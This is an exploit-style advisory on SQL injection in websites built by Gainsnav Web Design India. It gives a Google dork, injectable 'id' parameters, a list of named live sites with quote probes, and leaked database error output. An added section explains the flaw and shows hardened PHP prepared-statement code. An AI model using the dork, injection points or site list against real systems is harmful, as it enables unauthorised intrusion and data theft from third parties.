
Design by Gainsnav Web Design India SQL Injection Vulnerability

Author: KingSkrupellos, Published: 10-10-2018
# Exploit Title : Design by Gainsnav Web Design India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 26/06/2018
# Vendor Homepage : gainsnav.com
# Google Dork : intext:''Design by Gainsnav''
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploits :

/news.php?id=[SQL Inj]

/content.php?id=[SQL Inj]

/inner_attraction.php?id=[SQL Inj]

/inner.php?id=[SQL Inj]

#################################################################################################

# Example Vulnerable Sites =>

vnscollege.com/news.php?id=15%27 => [ Proof of Concept ] => archive.is/H7OV6

lakepalaceresorts.com/inner_attraction.php?id=4%27

munnarsafariresorts.com/inner.php?id=4%27

valuegrowthsolutions.com/service.php?id=2%27

highrangedairy.com/contents.php?id=5%27

shubhavitravels.in/packages.php?id=29%27

dietpathanamthitta.org/news.php?id=1%27

samstarelectrics.com/inner.php?cid=21%27

# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/vnscollegekonni2/public_html/news.php on line 9

SELECT title,short_descp ,content,meta_title,meta_keywords,meta_desc FROM
tbl_cms WHERE id='21''--
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''21''' at line 1
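The error output above implies that the `id` request parameter is concatenated straight into the query string. As an added example that is not the vendor's code, here is that pattern reconstructed next to a hardened version using mysqli prepared statements; the table and column names are taken from the query shown above, while the connection details, the function names and the assumption that `tbl_cms.id` is an integer column are mine.

```php
<?php
// Added example (not the vendor's code). Reconstructs the pattern implied by the
// advisory's error output and shows the hardened form next to it.
// Assumptions: a mysqli connection, table tbl_cms with an integer id column,
// column names as in the query quoted in the advisory.

// Vulnerable pattern (legacy mysql_* API, removed in PHP 7): the raw GET value is
// pasted into the SQL text, so ?id=21' produces ... WHERE id='21'' and a syntax error.
function fetch_page_vulnerable(string $id)
{
    $sql = "SELECT title,short_descp,content,meta_title,meta_keywords,meta_desc "
         . "FROM tbl_cms WHERE id='" . $id . "'";
    $res = mysql_query($sql);        // returns false on a syntax error ...
    return mysql_fetch_array($res);  // ... hence "expects parameter 1 to be resource, boolean given"
}

// Hardened form: validate the type, bind the value as a parameter, and keep
// driver errors out of the HTTP response.
function fetch_page_safe(mysqli $db, string $raw_id): ?array
{
    // id is a numeric key: reject anything that is not a positive integer up front
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(404);
        return null;
    }
    $stmt = $db->prepare(
        'SELECT title, short_descp, content, meta_title, meta_keywords, meta_desc '
        . 'FROM tbl_cms WHERE id = ?'
    );
    $stmt->bind_param('i', $id);     // value travels separately from the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

// Hypothetical use in news.php: errors are logged server-side instead of being
// echoed to the browser with file paths and SQL, as in the warning quoted above.
ini_set('display_errors', '0');
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db   = new mysqli('localhost', 'app_user', 'PLACEHOLDER_PASSWORD', 'app_db');
$page = fetch_page_safe($db, $_GET['id'] ?? '');
```

With the prepared statement the request `news.php?id=21'` simply fails integer validation and returns a 404, and a value that does validate is bound as an integer, so it can never alter the query's structure.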

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
